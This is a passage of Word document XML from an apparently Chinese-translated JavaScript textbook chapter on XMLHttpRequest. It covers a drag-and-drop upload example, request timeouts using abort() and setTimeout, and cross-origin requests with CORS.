    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.ondrop=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(uploading)return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var files=e.dataTransfer.files;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(files</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>files.length){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>uploading=true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var message="Uploading files:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>files.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>message+="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+files[i].name+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/li</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>message+="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/ul</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.innerHTML=message;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.classList.remove("wantdrop");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.classList.add("uploading");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open("POST",url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var body=new FormData();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>files.length;i++)body.append(i,files[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.upload.onprogress=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.lengthCompu</w:t>
      </w:r>
      <w:r>
        <w:t>table){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.innerHTML=message+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.round(e.loaded/e.total*100)+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"%Complete";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.upload.onload=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>uploading=false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.classList.remove("uploading");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.innerHTML="Drop files to upload";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send(body);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>target.c</w:t>
      </w:r>
      <w:r>
        <w:t>lassList.remove("wantdrop");</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56" w:name="18_1_5_Zhong_Zhi_Qing_Qiu_He_Chao_Shi_"/>
      <w:r>
        <w:t>18.1.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　中止请求和超时</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来取消正在进行的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在所有的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>版本和</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>中可用，调用</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在这个对象上触发</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件。（在写本章时，某些浏览器支持</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件。可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>"onabort"</w:t>
      </w:r>
      <w:r>
        <w:t>属性是否存在来判断。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>的主要原因是完成取消或超时请求消耗的时间太长或当响应变得无关时。假设使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>为文本输入域请求自动完成推荐。如果用户在服务器的建议达到之前输入了新字符，这时等待请求不再有趣，应该中止。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>属性来指定请求自动中止后的毫秒数，也定义了</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>事件用于当超时发生时触发（不是</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件）。在写本章时，浏览器不支持这些自动超时（并且它们的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象没有</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ontimeout</w:t>
      </w:r>
      <w:r>
        <w:t>属性）。可以用</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>14.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）和</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法实现自己的超时。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-12</w:t>
      </w:r>
      <w:r>
        <w:t>演示如何这么做。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-12</w:t>
      </w:r>
      <w:r>
        <w:t>：实现超时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求获取指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果响应成功到达，传入</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果响应在</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒内没有到达，中止这个请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器可能在</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>后触发</w:t>
      </w:r>
      <w:r>
        <w:t>"readystatechange"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果是部分请求结果到达，甚至可能设置</w:t>
      </w:r>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所以需要设置一个标记，当部分且超时的响应到达时不会调用回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件就没有</w:t>
      </w:r>
      <w:r>
        <w:t>这个风险</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function timedGetText(url,timeout,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建新请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var timedout=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>是否超时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>启动计时器，在</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒后将中止请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var timer=setTimeout(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果触发，启动一个计时器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>timedout=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置标记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.abort();//</w:t>
      </w:r>
      <w:r>
        <w:t>然后中止请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>timeout);//</w:t>
      </w:r>
      <w:r>
        <w:t>中止请求之前的时长</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("GET",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onreadystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.readyState!==4)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略未完成的请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(timedout)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略中止请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>clearTimeout(timer);//</w:t>
      </w:r>
      <w:r>
        <w:t>取消等待的超时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.status===200)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(request.responseText);//</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:t>传给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>request.send(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>立即发送请求</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57" w:name="18_1_6_Kua_Yu_HTTPQing_Qiu_"/>
      <w:r>
        <w:t>18.1.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　跨域</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="457"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>作为同源策略（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）的一部分，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象通常仅可以发起和文档具有相同服务器的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。这个限制关闭了安全漏洞，但它笨手笨脚并且也阻止了大量合适使用的跨域请求。可以在＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中使用跨域</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，而浏览器显示最终的跨域文档。但因为同源策略，浏览器不允许原</w:t>
      </w:r>
      <w:r>
        <w:t>始脚本查找跨域文档的内容。使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>，文档内容都是通过</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>属性暴露，所以同源策略不允许</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>进行跨域请求。（注意＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素并未真正受限于同源策略：它加载并执行任何来源的脚本。如果我们看</w:t>
      </w:r>
      <w:r>
        <w:t>18.2</w:t>
      </w:r>
      <w:r>
        <w:t>节，跨域请求的灵活性使得＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素成为取代</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的主流</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>通过在</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应中选择发送合适的</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Cross-Origin Resource Sharing</w:t>
      </w:r>
      <w:r>
        <w:t>，跨域资源共享）允许跨域访问</w:t>
      </w:r>
      <w:r>
        <w:t>网站。在写本书时，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>的当前版本都支持</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>通过这里没有列出的专用</w:t>
      </w:r>
      <w:r>
        <w:t>XDomainRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象支持它。作为</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>程序员，使用这个功能并不需要做什么额外的工作：如果浏览器支持</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHtt</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>且实现跨域请求的网站决定使用</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>允许跨域请求，那么同源策略将不放宽而跨域请求就会正常工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>虽然实现</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>支持的跨域请求工作不需要做任何事情，但有一些安全细节需要了解。首先，如果给</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入用户名和密码</w:t>
      </w:r>
      <w:r>
        <w:t>，那么它们绝对不会通过跨域请求发送（这使分布式密码破解攻击成为可能）。除外，跨域请求通常也不会包含其他任何的用户证书：</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>身份验证令牌（</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:t>）通常不会作为请求的内容部分发送且任何作为跨域响应来接收的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>都会丢弃。如果跨域请求需要这几种凭证才能成功，那么必须在用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>发送请求前设置</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>withCredentials</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。这样做不常见，但测试</w:t>
      </w:r>
      <w:r>
        <w:t>withCredentials</w:t>
      </w:r>
      <w:r>
        <w:t>的存在性是测试浏览器是否支持</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>的一种方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:t>8-13</w:t>
      </w:r>
      <w:r>
        <w:t>是常见</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，它使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP HEAD</w:t>
      </w:r>
      <w:r>
        <w:t>请求以下载文档中＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素链接资源的类型、大小和时间等信息。这个</w:t>
      </w:r>
      <w:r>
